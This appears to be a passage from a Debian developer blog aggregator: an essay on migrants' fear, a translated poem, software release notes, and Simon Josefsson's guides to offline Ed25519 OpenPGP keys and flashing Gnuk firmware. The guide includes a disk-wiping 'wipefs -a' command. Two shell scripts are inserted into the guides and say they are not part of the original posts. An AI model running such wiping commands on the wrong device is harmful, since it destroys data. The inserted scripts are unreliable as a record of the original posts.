16. You are fumbling for your keys at the entrance of the building. Somebody walks out of the door at the same time. You are happy not to be fishing for keys, so you ask them to hold the door and scurry up inside. The person asks where you want to go. You tell them you live here. You have never seen each other. You nod, wanting to get home. You get out of the slow elevator and from around the corner you see the person from downstairs looking at you. She has taken the stairs to see you safe home.

17. You enter home and even before you have taken off the bag, or the double layers of coats on your shoulder, you feel a weight come off your shoulders. You stretch to your full height. You breathe deeply. In the solace of solitude, you feel the layers of the day strip off. You head into a warm shower and wash all the gazes that have scorched your body. You step out. While drying in front of the misty mirror, you realise that if this continues, it will soon become habit. When your body is a question, you live like an apology. And these are the experiences of a life that is well shielded, protected, and supported by privilege, mobility, work, health, communities of love and trust, and money. So for anybody who is more precarious this must be amplified multiple times. If you know somebody who feels that they are bodies and skins of suspicion, now you know the cruel algebra of life that they are constantly solving. If somebody tells you they are worried, anxious, feeling afraid because of what this populist verdict has delivered, don’t downplay their dread. It is theirs. Let them work through it. You cannot change it by merely offering your love and care. It helps, but this is not a personal question of feelings – it is a structural problem of survival. Their experience is not an accusation towards you. It is merely an apology for themselves. You might not have voted for this to happen. But you are still a part of the system, and the only way out of this is for us to challenge the normalization of hatred and violence.

https://nishantshah.online/ , Nishant Shah , Academic, Educator, Researcher and Annotator, Netherlands.

As shared by Nishant; while I have not met him, I have had the privilege of reading many of the articles penned by him, many a time, in Indian Express and other places. We have also managed to near-miss each other even though I have been to Bangalore quite a number of times, to CIS, when he was part of CIS. Also, this is not just about what he experienced and what many other people who are foreigners or migrants feel; it is also to shed light for all those who think of migration as the goose which lays the golden egg but forget the cost.

The other is from one of my favorite lyricists, poets and writers, who made many marriages happen and is also likely to bear the cross for the same (from either husbands or wives), Miyan Javed Akhtar Sahab –

To speak of that which everyone is fearful, of that you must write
The night was never so dark ever before, write!

Throw away the pens with which you wrote the odes
In praise of the true pen dipped in the heart’s blood, write!

The narrow circles that confine you, break all of them
Come under the open skies now, of a new creation, write!

That which finds no place in the daily newspapers
That incident which happens everywhere every day, write!

That which has happened finds mentions
But of those that should have happened, write!

If you wish to see spring return to this garden
Call out from every branch and on every leaf, write!

Written by Miyan Javed Akhtar Sahab, translated by Rakshanda Jalil for scroll.in where it first appeared digitally to my knowledge.

24 March, 2019 05:26PM by shirishag75

Jelmer Vernooij

Breezy evolves

Last month Martin, Vincent and I finally released version 3.0.0 of Breezy, a little over a year after we originally forked Bazaar.

When we started working on Breezy, it was mostly as a way to keep Bazaar working going forward (in a world where Python 2 has mostly disappeared in favour of Python 3).

Improvements

Since then, we have also made other improvements. In addition to Python 3 support, Breezy comes with the following other bigger changes:

Batteries Included

Breezy bundles most of the common plugins. This makes the installation of Breezy much simpler (pip install brz), and prevents possible issues with API incompatibility that plagued Bazaar.

Bundled plugins include: grep, git, fastimport, propose, upload, stats and parts of bzrtools.

>120 fixed bugs

Since Bazaar 2.7, lots of bugs in the Bazaar code base have been fixed (over 120 as of March 2019). We've also started an effort to go through all bugs in the Bazaar bug tracker to see whether they also apply to Breezy.

Native Git Support

Breezy now supports the Git file formats as a first class citizen; Git support is included in Breezy itself, and should work just as well as regular Bazaar format repositories.

Improved abstractions

Bazaar has always had a higher level API that could be used for version control operations, and which was implemented for the Bazaar, Git and Subversion formats.

As part of the work to support the Git format natively, we have changed the API to remove Bazaar-specific artefacts, like the use of file ids. Inventories (a Bazaar concept) are now also an implementation detail of the bzr formats, and not a concept that is visible in the API or UI.

In the future, I hope the API will be useful for tools that want to make automated changes to any version controlled resource, whether that be Git, Bazaar, Subversion or Mercurial repositories.

24 March, 2019 04:00PM by Jelmer Vernooij

Petter Reinholdtsen

Release 0.3 of free software archive API system Nikita announced

Yesterday, a new release of the Nikita Noark 5 core project was announced on the project mailing list. The free software solution is an implementation of the Norwegian archive standard Noark 5 used by government offices in Norway. These were the changes in version 0.3 since version 0.2.1 (from NEWS.md):

  • Improved ClassificationSystem and Class behaviour.
  • Tidied up known inconsistencies between domain model and hateoas links.
  • Added experimental code for blockchain integration.
  • Make token expiry time configurable at upstart from properties file.
  • Continued work on OData search syntax.
  • Started work on pagination for entities, partly implemented for Saksmappe.
  • Finalise ClassifiedCode Metadata entity.
  • Implement mechanism to check if authentication token is still valid. This allows the GUI to return a more sensible message to the user if the token is expired.
  • Reintroduce browse.html page to allow user to browse JSON API using hateoas links.
  • Fix bug in handling file/mappe sequence number. Year change was not properly handled.
  • Update application yml files to be in sync with current development.
  • Stop 'converting' everything to PDF using libreoffice. Only convert the file formats doc, ppt, xls, docx, pptx, xlsx, odt, odp and ods.
  • Continued code style fixing, making code more readable.
  • Minor bug fixes.

If a free and open standardized archiving API sounds interesting to you, please contact us on IRC (#nikita on irc.freenode.net) or email (nikita-noark mailing list).

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

24 March, 2019 01:30PM

March 23, 2019

Riku Voipio

On the #uploadfilter problem

The copyright holders in Europe are pushing hard to mandate upload filters for the internet. We have been here before - when they outlawed circumventing DRM. Both have roots in the same problem. The copyright holders look at computers and see bad things happening to their revenue. They come to IT companies and say "FIX IT". The IT industry comes back and says: "We can't. Making data impossible to copy is like trying to make water not wet!" But we fail at convincing copyright holders that a perfect DRM or upload filter is not possible. Then copyright holders go to lawmakers and ask them in turn to fix it.

We need to turn the tables around. If they want something impossible, it should be up to them to implement it.

It is simply unfair to require each online provider to implement an AI to detect copyright infringement, manage a database of copyrighted content and pay the costs of running it all... and then get slapped with a lawsuit anyway, since copyrighted content is still slipping through.

The burden of implementing #uploadfilter should be on the copyright holder organizations. Implement it as a SaaS. YouTube and other web platforms call your API and pay $0.01 each time pirated content is detected. On the other side, to ensure correctness of the filter, copyright holders have to pay any lost revenue, court costs and so on for each false positive.

Filtering uploads is still problematic. But it's now the copyright holders' problem. Instead of people blaming web companies for poor filters, it's now the copyright holders who have to answer to the public why their filters are rejecting content that doesn't belong to them.

23 March, 2019 04:07PM by Riku Voipio (noreply@blogger.com)

March 22, 2019

Dirk Eddelbuettel

RcppArmadillo 0.9.300.2.0

A new RcppArmadillo release based on a new Armadillo upstream release arrived on CRAN and Debian today.

Armadillo is a powerful and expressive C++ template library for linear algebra aiming towards a good balance between speed and ease of use with a syntax deliberately close to Matlab. RcppArmadillo integrates this library with the R environment and language–and is widely used by (currently) 583 other packages on CRAN.

The (upstream-only this time) changes are listed below:

Changes in RcppArmadillo version 0.9.300.2.0 (2019-03-21)

  • Upgraded to Armadillo release 9.300.2 (Fomo Spiral)

    • Faster handling of compound complex matrix expressions by trace()

    • More efficient handling of element access for inplace modifications in sparse matrices

    • Added .is_sympd() to check whether a matrix is symmetric/hermitian positive definite

    • Added interp2() for 2D data interpolation

    • Added expm1() and log1p()

    • Expanded .is_sorted() with options "strictascend" and "strictdescend"

    • Expanded eig_gen() to optionally perform balancing prior to decomposition

Courtesy of CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

22 March, 2019 10:57PM

Enrico Zini

debian-vote statistics

Updated: re-run 2019-04-02

Updated: re-run after merging Andreas Tille's addresses

Updated: re-run after fixing a bug in the code that skips signatures

Updated: re-run on a mailbox with only the post-nomination discussion.

I made a script to compute some statistics on debian-vote's election discussions.

Here are the results as of 2019-04-02 12:00 UTC+1:

These are the number of mails sent by people who posted more than 2 messages:

Name                              Mails
=======================================
Jonathan Carter                      33
Joerg Jaspert                        31
Martin Michlmayr                     20
Sam Hartman                          18
Andreas Tille                        11
Lucas Nussbaum                        8
Stefano Zacchiroli                    8
Sean Whitton                          7
Jose Miguel Parrella                  6
Jonas Meurer                          5
Paulo Henrique de Lima Santana        5
Laura Arjona Reina                    4
martin f krafft                       4
Louis-Philippe_Véronneau              3
Alexander Wirt                        3
Ansgar                                3
Ian Jackson                           3
Paul Wise                             3
Raphael Hertzog                       3

These are the sums and averages of lines of non-quoted message text sent by people:

Name                                Sum   Avg
=============================================
Jonathan Carter                    1475    45
Sam Hartman                         799    44
Joerg Jaspert                       684    22
Martin Michlmayr                    665    33
Andreas Tille                       287    26
Lucas Nussbaum                      204    26
Jose Miguel Parrella                167    28
Ian Jackson                         140    47
Stefano Zacchiroli                  127    16
Sean Whitton                        109    16
Jonas Meurer                         96    19
Paulo Henrique de Lima Santana       89    18
Laura Arjona Reina                   80    20
Ansgar                               68    23
martin f krafft                      68    17
Louis-Philippe Véronneau             67    22
Raphael Hertzog                      43    14
Alexander Wirt                       36    12
Paul Wise                            23     8

These are the top keywords of messages sent by the candidates so far, scored by an improvised TFIDF metric:

Sam Hartman
  valuable, people, helping, things, consensus, project, think
Jonathan Carter
  software, think, make, help, time, free, project
Joerg Jaspert
  thats, nice, whatever, stuff, people, simple, need
Martin Michlmayr
  believe, foss, where, maybe, people, world, these

22 March, 2019 11:48AM

Elana Hashman

SREcon19 Americas Talk Resources

At SREcon19 Americas, I gave a talk called "Operating within Normal Parameters: Monitoring Kubernetes". Here are some links and resources related to my talk, for your reference.

Operating within Normal Parameters: Monitoring Kubernetes

Additional Prometheus metrics sources

Related readings

I'm including these documents for reference to add some context around what's currently happening (as of 2019Q1) in the Kubernetes instrumentation SIG and wider ecosystem.

Note that GitHub links are pinned to their most recent commit to ensure they will not break; if you want the latest version, make sure to switch the branch to "master".

22 March, 2019 04:00AM by Elana Hashman

March 21, 2019

Simon Josefsson

Offline Ed25519 OpenPGP key with subkeys on FST-01G running Gnuk

Below I describe how to generate an OpenPGP key and import it to a FST-01G device running Gnuk. See my earlier post on planning for my new OpenPGP key and the post on preparing the FST-01G to run Gnuk. For comparison with a RSA/YubiKey based approach, you can read about my setup from 2014.

Most of the steps below are covered by the Gnuk manual. The primary complication for me is the use of an offline machine and storing the GnuPG directory on a USB memory device.

Offline machine

I use a laptop that is not connected to the Internet and boot it from a read-only USB memory stick. Finding a live CD that contains the necessary tools for using GnuPG with smartcards (gpg-agent, scdaemon, pcscd) is significantly harder than it should be. Using a rarely audited image begs the question of whether you can trust it. A patched kernel/gpg to generate poor randomness would be an easy and hard to notice hack. I’m using the PGP/PKI Clean Room Live CD. Recommendations on more widely used and audited alternatives would be appreciated. Select “Advanced Options” and “Run Shell” to escape the menus. Insert a new USB memory device, and prepare it as follows:

pgp@pgplive:/home/pgp$ sudo wipefs -a /dev/sdX
pgp@pgplive:/home/pgp$ sudo fdisk /dev/sdX
# create a primary partition of Linux type
pgp@pgplive:/home/pgp$ sudo mkfs.ext4 /dev/sdX1
pgp@pgplive:/home/pgp$ sudo mount /dev/sdX1 /mnt
pgp@pgplive:/home/pgp$ sudo mkdir /mnt/gnupghome
pgp@pgplive:/home/pgp$ sudo chown pgp.pgp /mnt/gnupghome
pgp@pgplive:/home/pgp$ sudo chmod go-rwx /mnt/gnupghome

GnuPG configuration

Set your GnuPG home directory to point to the gnupghome directory on the USB memory device. You will need to do this in every terminal window you open that you want to use GnuPG in.

pgp@pgplive:/home/pgp$ export GNUPGHOME=/mnt/gnupghome
pgp@pgplive:/home/pgp$

At this point, you should be able to run gpg --card-status and get output from the smartcard.

Create master key

Create a master key and make a backup copy of the GnuPG home directory with it, together with an exported ASCII version.

pgp@pgplive:/home/pgp$ gpg --quick-gen-key "Simon Josefsson <simon@josefsson.org>" ed25519 sign 216d
gpg: keybox '/mnt/gnupghome/pubring.kbx' created
gpg: /mnt/gnupghome/trustdb.gpg: trustdb created
gpg: key D73CF638C53C06BE marked as ultimately trusted
gpg: directory '/mnt/gnupghome/openpgp-revocs.d' created
gpg: revocation certificate stored as '/mnt/gnupghome/openpgp-revocs.d/B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE.rev'
pub   ed25519 2019-03-20 [SC] [expires: 2019-10-22]
      B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE
      B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE
uid                      Simon Josefsson <simon@josefsson.org>

pgp@pgplive:/home/pgp$ gpg -a --export-secret-keys B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/masterkey.txt
pgp@pgplive:/home/pgp$ sudo cp -a $GNUPGHOME $GNUPGHOME-backup-masterkey
pgp@pgplive:/home/pgp$ 

Create subkeys

Create subkeys and make a backup of them too, as follows.

pgp@pgplive:/home/pgp$ gpg --quick-add-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE cv25519 encr 216d
pgp@pgplive:/home/pgp$ gpg --quick-add-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE ed25519 auth 216d
pgp@pgplive:/home/pgp$ gpg --quick-add-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE ed25519 sign 216d
pgp@pgplive:/home/pgp$ gpg -a --export-secret-keys B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/mastersubkeys.txt
pgp@pgplive:/home/pgp$ gpg -a --export-secret-subkeys B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/subkeys.txt
pgp@pgplive:/home/pgp$ sudo cp -a $GNUPGHOME $GNUPGHOME-backup-mastersubkeys
pgp@pgplive:/home/pgp$ 

Move keys to card

Prepare the card by setting Admin PIN, PIN, your full name, sex, login account, and key URL as you prefer, following the Gnuk manual on card personalization.

Move the subkeys from your GnuPG keyring to the FST-01G using the keytocard command.

Take a final backup, because moving the subkeys to the card modifies the local GnuPG keyring, and create an ASCII-armored version of the public key, to be transferred to your daily machine.

pgp@pgplive:/home/pgp$ gpg --list-secret-keys
/mnt/gnupghome/pubring.kbx
--------------------------
sec   ed25519 2019-03-20 [SC] [expires: 2019-10-22]
      B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE
uid           [ultimate] Simon Josefsson <simon@josefsson.org>
ssb>  cv25519 2019-03-20 [E] [expires: 2019-10-22]
ssb>  ed25519 2019-03-20 [A] [expires: 2019-10-22]
ssb>  ed25519 2019-03-20 [S] [expires: 2019-10-22]

pgp@pgplive:/home/pgp$ gpg -a --export-secret-keys B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/masterstubs.txt
pgp@pgplive:/home/pgp$ gpg -a --export-secret-subkeys B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/subkeysstubs.txt
pgp@pgplive:/home/pgp$ gpg -a --export B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/publickey.txt
pgp@pgplive:/home/pgp$ sudo cp -a $GNUPGHOME $GNUPGHOME-backup-masterstubs
pgp@pgplive:/home/pgp$ 

Transfer to daily machine

Copy publickey.txt to your day-to-day laptop and import it and create stubs using --card-status.

jas@latte:~$ gpg --import < publickey.txt 
gpg: key D73CF638C53C06BE: public key "Simon Josefsson <simon@josefsson.org>" imported
gpg: Total number processed: 1
gpg:               imported: 1
jas@latte:~$ gpg --card-status

Reader ...........: Free Software Initiative of Japan Gnuk (FSIJ-1.2.14-67252015) 00 00
Application ID ...: D276000124010200FFFE672520150000
Version ..........: 2.0
Manufacturer .....: unmanaged S/N range
Serial number ....: 67252015
Name of cardholder: Simon Josefsson
Language prefs ...: sv
Sex ..............: male
URL of public key : https://josefsson.org/key-20190320.txt
Login data .......: jas
Signature PIN ....: not forced
Key attributes ...: ed25519 cv25519 ed25519
Max. PIN lengths .: 127 127 127
PIN retry counter : 3 3 3
Signature counter : 0
Signature key ....: A3CC 9C87 0B9D 310A BAD4  CF2F 5172 2B08 FE47 45A2
      created ....: 2019-03-20 23:40:49
Encryption key....: A9EC 8F4D 7F1E 50ED 3DEF  49A9 0292 3D7E E76E BD60
      created ....: 2019-03-20 23:40:26
Authentication key: CA7E 3716 4342 DF31 33DF  3497 8026 0EE8 A9B9 2B2B
      created ....: 2019-03-20 23:40:37
General key info..: sub  ed25519/51722B08FE4745A2 2019-03-20 Simon Josefsson <simon@josefsson.org>
sec   ed25519/D73CF638C53C06BE  created: 2019-03-20  expires: 2019-10-22
ssb>  cv25519/02923D7EE76EBD60  created: 2019-03-20  expires: 2019-10-22
                                card-no: FFFE 67252015
ssb>  ed25519/80260EE8A9B92B2B  created: 2019-03-20  expires: 2019-10-22
                                card-no: FFFE 67252015
ssb>  ed25519/51722B08FE4745A2  created: 2019-03-20  expires: 2019-10-22
                                card-no: FFFE 67252015
jas@latte:~$ 

Before the key can be used after the import, you must update the trust database for the secret key.

Now you should have an offline master key with subkey stubs. Note in the output below that the master key is not available (sec#) and the subkeys are stubs for smartcard keys (ssb>).

jas@latte:~$ gpg --list-secret-keys
sec#  ed25519 2019-03-20 [SC] [expires: 2019-10-22]
      B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE
uid           [ultimate] Simon Josefsson <simon@josefsson.org>
ssb>  cv25519 2019-03-20 [E] [expires: 2019-10-22]
ssb>  ed25519 2019-03-20 [A] [expires: 2019-10-22]
ssb>  ed25519 2019-03-20 [S] [expires: 2019-10-22]

jas@latte:~$
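The sec#/ssb> check described above can be scripted against gpg's machine-readable listing instead of being read by eye. This is an added example, not part of the original post: the function names and the pass/fail policy are assumptions, and the sample records are constructed from the key IDs and card serial shown above with made-up timestamps.

```shell
#!/bin/sh
# Audit `gpg --list-secret-keys --with-colons` output read from stdin.
# Field 15 of a sec/ssb record says where the secret material is:
#   '#'            secret part missing (offline stub)
#   serial number  key lives on a smartcard
#   '+'            secret key is stored in the local keyring
# Policy (assumption for this example): the primary key must be offline
# and every subkey must be on a card.

audit_secret_listing() {
    awk -F: '
        $1 == "sec" || $1 == "ssb" {
            if ($15 == "#")                    state = "offline"
            else if ($15 == "+" || $15 == "")  state = "on-disk"
            else                               state = "card:" $15
            printf "%s %s %s\n", $1, $5, state
            if ($1 == "sec" && state != "offline") bad = 1
            if ($1 == "ssb" && state !~ /^card:/)  bad = 1
            seen = 1
        }
        END { if (bad || !seen) exit 1 }
    '
}

# Constructed sample: what the daily machine should report.
daily_sample() {
    cat <<'EOF'
sec:u:255:22:D73CF638C53C06BE:1553125200:1571702400::u:::sc:::#::ed25519:
fpr:::::::::B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE:
ssb:u:255:18:02923D7EE76EBD60:1553125200:1571702400:::::e:::D276000124010200FFFE672520150000::cv25519:
ssb:u:255:22:80260EE8A9B92B2B:1553125200:1571702400:::::a:::D276000124010200FFFE672520150000::ed25519:
ssb:u:255:22:51722B08FE4745A2:1553125200:1571702400:::::s:::D276000124010200FFFE672520150000::ed25519:
EOF
}

# Constructed sample: the offline machine after keytocard. The primary
# secret key is still in the keyring there, so the policy rejects it.
offline_machine_sample() {
    cat <<'EOF'
sec:u:255:22:D73CF638C53C06BE:1553125200:1571702400::u:::sc:::+::ed25519:
ssb:u:255:18:02923D7EE76EBD60:1553125200:1571702400:::::e:::D276000124010200FFFE672520150000::cv25519:
ssb:u:255:22:80260EE8A9B92B2B:1553125200:1571702400:::::a:::D276000124010200FFFE672520150000::ed25519:
ssb:u:255:22:51722B08FE4745A2:1553125200:1571702400:::::s:::D276000124010200FFFE672520150000::ed25519:
EOF
}

echo "daily machine:"
daily_sample | audit_secret_listing && echo "=> OK"
echo "offline machine:"
offline_machine_sample | audit_secret_listing || echo "=> primary secret key present"

# Real use on the daily machine:
#   gpg --list-secret-keys --with-colons | audit_secret_listing
```
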

If your environment variables are set up correctly, SSH should find the authentication key automatically.

jas@latte:~$ ssh-add -L
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILzCFcHHrKzVSPDDarZPYqn89H5TPaxwcORgRg+4DagE cardno:FFFE67252015
jas@latte:~$ 

GnuPG and SSH are now ready to be used with the new key. Thanks for reading!

21 March, 2019 08:45PM by simon

Installing Gnuk on FST-01G running NeuG

The FST-01G device that you order from the FSF shop runs NeuG. To be able to use the device as an OpenPGP smartcard, you need to install Gnuk. While Niibe covers this in his tutorial, I found the steps a bit complicated to follow. The following guides you from buying the device to getting a FST-01G running Gnuk ready for use with GnuPG.

Once you have received the device and inserted it into a USB port, your kernel log (sudo dmesg) will show something like the following:

[628772.874658] usb 1-1.5.1: New USB device found, idVendor=234b, idProduct=0004
[628772.874663] usb 1-1.5.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[628772.874666] usb 1-1.5.1: Product: Fraucheky
[628772.874669] usb 1-1.5.1: Manufacturer: Free Software Initiative of Japan
[628772.874671] usb 1-1.5.1: SerialNumber: FSIJ-0.0
[628772.875204] usb-storage 1-1.5.1:1.0: USB Mass Storage device detected
[628772.875452] scsi host6: usb-storage 1-1.5.1:1.0
[628773.886539] scsi 6:0:0:0: Direct-Access     FSIJ     Fraucheky        1.0  PQ: 0 ANSI: 0
[628773.887522] sd 6:0:0:0: Attached scsi generic sg2 type 0
[628773.888931] sd 6:0:0:0: [sdb] 128 512-byte logical blocks: (65.5 kB/64.0 KiB)
[628773.889558] sd 6:0:0:0: [sdb] Write Protect is off
[628773.889564] sd 6:0:0:0: [sdb] Mode Sense: 03 00 00 00
[628773.890305] sd 6:0:0:0: [sdb] No Caching mode page found
[628773.890314] sd 6:0:0:0: [sdb] Assuming drive cache: write through
[628773.902617]  sdb:
[628773.906066] sd 6:0:0:0: [sdb] Attached SCSI removable disk

The device comes up as a USB mass storage device. Conveniently, it contains documentation describing what it is, and you can identify the version of NeuG it runs as follows.

jas@latte:~/src/gnuk$ head /media/jas/Fraucheky/README 
NeuG - a true random number generator implementation (for STM32F103)

							  Version 1.0.7
							     2018-01-19
						           Niibe Yutaka
				      Free Software Initiative of Japan

To convert the device into the serial-mode that is required for the software upgrade, use the eject command for the device (above it came up as /dev/sdb): sudo eject /dev/sdb. The kernel log will now contain something like this:

[628966.847387] usb 1-1.5.1: reset full-speed USB device number 27 using ehci-pci
[628966.955723] usb 1-1.5.1: device firmware changed
[628966.956184] usb 1-1.5.1: USB disconnect, device number 27
[628967.115322] usb 1-1.5.1: new full-speed USB device number 28 using ehci-pci
[628967.233272] usb 1-1.5.1: New USB device found, idVendor=234b, idProduct=0001
[628967.233277] usb 1-1.5.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[628967.233280] usb 1-1.5.1: Product: NeuG True RNG
[628967.233283] usb 1-1.5.1: Manufacturer: Free Software Initiative of Japan
[628967.233286] usb 1-1.5.1: SerialNumber: FSIJ-1.0.7-67252015
[628967.234034] cdc_acm 1-1.5.1:1.0: ttyACM0: USB ACM device

The strings NeuG True RNG and FSIJ-1.0.7 suggest it is running NeuG version 1.0.7.

Now both Gnuk itself and reGNUal need to be built, as follows. If you get any error message, you likely don’t have the necessary dependencies installed.

jas@latte:~/src$ git clone https://salsa.debian.org/gnuk-team/gnuk/neug.git
jas@latte:~/src$ git clone https://salsa.debian.org/gnuk-team/gnuk/gnuk.git
jas@latte:~/src$ cd gnuk/src/
jas@latte:~/src/gnuk/src$ git submodule update --init
jas@latte:~/src/gnuk/src$ ./configure --vidpid=234b:0000
...
jas@latte:~/src/gnuk/src$ make
...
jas@latte:~/src/gnuk/src$ cd ../regnual/
jas@latte:~/src/gnuk/regnual$ make
jas@latte:~/src/gnuk/regnual$ cd ../../

You are now ready to flash the device, as follows.

jas@latte:~/src$ sudo neug/tool/neug_upgrade.py -f gnuk/regnual/regnual.bin gnuk/src/build/gnuk.bin 
gnuk/regnual/regnual.bin: 4544
gnuk/src/build/gnuk.bin: 113664
CRC32: 931cab51

Device: 
Configuration: 1
Interface: 1
20000e00:20005000
Downloading flash upgrade program...
start 20000e00
end   20001f00
# 20001f00: 31 : 196
Run flash upgrade program...
Wait 3 seconds...
Device: 
08001000:08020000
Downloading the program
start 08001000
end   0801bc00
jas@latte:~/src$ 

Remove and insert the device and the kernel log should contain something like this:

[629120.399875] usb 1-1.5.1: new full-speed USB device number 32 using ehci-pci
[629120.511003] usb 1-1.5.1: New USB device found, idVendor=234b, idProduct=0000
[629120.511008] usb 1-1.5.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[629120.511011] usb 1-1.5.1: Product: Gnuk Token
[629120.511014] usb 1-1.5.1: Manufacturer: Free Software Initiative of Japan
[629120.511017] usb 1-1.5.1: SerialNumber: FSIJ-1.2.14-67252015

The device can now be used with GnuPG as a smartcard device.

jas@latte:~/src/gnuk$ gpg --card-status
Reader ...........: 234B:0000:FSIJ-1.2.14-67252015:0
Application ID ...: D276000124010200FFFE672520150000
Version ..........: 2.0
Manufacturer .....: unmanaged S/N range
Serial number ....: 67252015
Name of cardholder: [not set]
Language prefs ...: [not set]
Sex ..............: unspecified
URL of public key : [not set]
Login data .......: [not set]
Signature PIN ....: forced
Key attributes ...: rsa2048 rsa2048 rsa2048
Max. PIN lengths .: 127 127 127
PIN retry counter : 3 3 3
Signature counter : 0
Signature key ....: [none]
Encryption key....: [none]
Authentication key: [none]
General key info..: [none]
jas@latte:~/src/gnuk$ 

Congratulations!
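The kernel-log check used at each step above (idProduct 0004, then 0001, then 0000 after flashing) can be automated to confirm that the flash took effect. This is an added example, not part of the original post: the function names are assumptions, and the sample logs are copied from the kernel log excerpts above.

```shell
#!/bin/sh
# Read kernel log text on stdin and report the most recently enumerated
# FSIJ device (idVendor=234b) as "idProduct|Product|firmware version".
# The version is taken from the SerialNumber string (FSIJ-<version>-<serial>).

fsij_state() {
    awk '
        match($0, /usb [0-9][-0-9.]*: /) {
            port = substr($0, RSTART + 4, RLENGTH - 6)
            rest = substr($0, RSTART + RLENGTH)
            if (rest ~ /^New USB device found/) {
                fsij[port] = (rest ~ /idVendor=234b/)
                if (fsij[port]) {
                    match(rest, /idProduct=[0-9a-f]+/)
                    pid = substr(rest, RSTART + 10, RLENGTH - 10)
                    prod = ""; ser = ""; last = port
                }
            } else if (fsij[port] && port == last) {
                if (rest ~ /^Product: /)      prod = substr(rest, 10)
                if (rest ~ /^SerialNumber: /) ser  = substr(rest, 15)
            }
        }
        END {
            if (pid == "") exit 1
            split(ser, part, "-")
            printf "%s|%s|%s\n", pid, prod, part[2]
        }
    '
}

# Succeeds only if the last FSIJ device seen is a Gnuk Token (idProduct 0000).
gnuk_flash_ok() {
    state=$(fsij_state) || return 1
    case $state in
        "0000|Gnuk Token|"*) return 0 ;;
        *)                   return 1 ;;
    esac
}

# Log after "sudo eject" (serial mode), copied from the post.
serial_mode_log() {
    cat <<'EOF'
[628967.115322] usb 1-1.5.1: new full-speed USB device number 28 using ehci-pci
[628967.233272] usb 1-1.5.1: New USB device found, idVendor=234b, idProduct=0001
[628967.233277] usb 1-1.5.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[628967.233280] usb 1-1.5.1: Product: NeuG True RNG
[628967.233283] usb 1-1.5.1: Manufacturer: Free Software Initiative of Japan
[628967.233286] usb 1-1.5.1: SerialNumber: FSIJ-1.0.7-67252015
[628967.234034] cdc_acm 1-1.5.1:1.0: ttyACM0: USB ACM device
EOF
}

# Log after flashing and re-inserting the device, copied from the post.
after_flash_log() {
    cat <<'EOF'
[629120.399875] usb 1-1.5.1: new full-speed USB device number 32 using ehci-pci
[629120.511003] usb 1-1.5.1: New USB device found, idVendor=234b, idProduct=0000
[629120.511008] usb 1-1.5.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[629120.511011] usb 1-1.5.1: Product: Gnuk Token
[629120.511014] usb 1-1.5.1: Manufacturer: Free Software Initiative of Japan
[629120.511017] usb 1-1.5.1: SerialNumber: FSIJ-1.2.14-67252015
EOF
}

echo "before flash: $(serial_mode_log | fsij_state)"
echo "after flash:  $(after_flash_log | fsij_state)"

# Real use: sudo dmesg | gnuk_flash_ok && echo "Gnuk is running"
```
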

21 March, 2019 08:39PM by simon

OpenPGP 2019 Key Transition Statement

I have created a new OpenPGP key and will be transitioning away from my old key. If you have signed my old key, I would appreciate signatures on my new key as well. I have created a transition statement that can be downloaded from https://josefsson.org/key-transition-2019-03-20.txt.

Below is the signed statement.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

OpenPGP Key Transition Statement for Simon Josefsson <simon@josefsson.org>

I have created a new OpenPGP key and will be transitioning away from
my old key.  The old key has not been compromised and will continue to
be valid for some time, but I prefer all future correspondence to be
encrypted to the new key, and will be making signatures with the new
key going forward.

I would like this new key to be re-integrated into the web of trust.
This message is signed by both keys to certify the transition.  My new
and old keys are signed by each other.  If you have signed my old key,
I would appreciate signatures on my new key as well, provided that
your signing policy permits that without re-authenticating me.

The old key, which I am transitioning away from, is:

pub   rsa3744 2014-06-22 [SC]
      9AA9 BDB1 1BB1 B99A 2128  5A33 0664 A769 5426 5E8C

The new key, to which I am transitioning, is:

pub   ed25519 2019-03-20 [SC]
      B1D2 BD13 75BE CB78 4CF4  F8C4 D73C F638 C53C 06BE

The key may be downloaded from: https://josefsson.org/key-20190320.txt

To fetch the full new key from a public key server using GnuPG, run:

  gpg --keyserver keys.gnupg.net \
      --recv-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE

If you already know my old key, you can now verify that the new key is
signed by the old one:

  gpg --check-sigs B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE

If you are satisfied that you've got the right key, and the User IDs
match what you expect, I would appreciate it if you would sign my key:

  gpg --sign-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE

You can upload your signatures to a public keyserver directly:

  gpg --keyserver keys.gnupg.net \
      --send-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE

Or email simon@josefsson.org (possibly encrypted) the output from:

  gpg --armor --export B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE

If you'd like any further verification or have any questions about the
transition please contact me directly.

To verify the integrity of this statement:

  wget -q -O- https://josefsson.org/key-transition-2019-03-20.txt | gpg --verify

/Simon
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

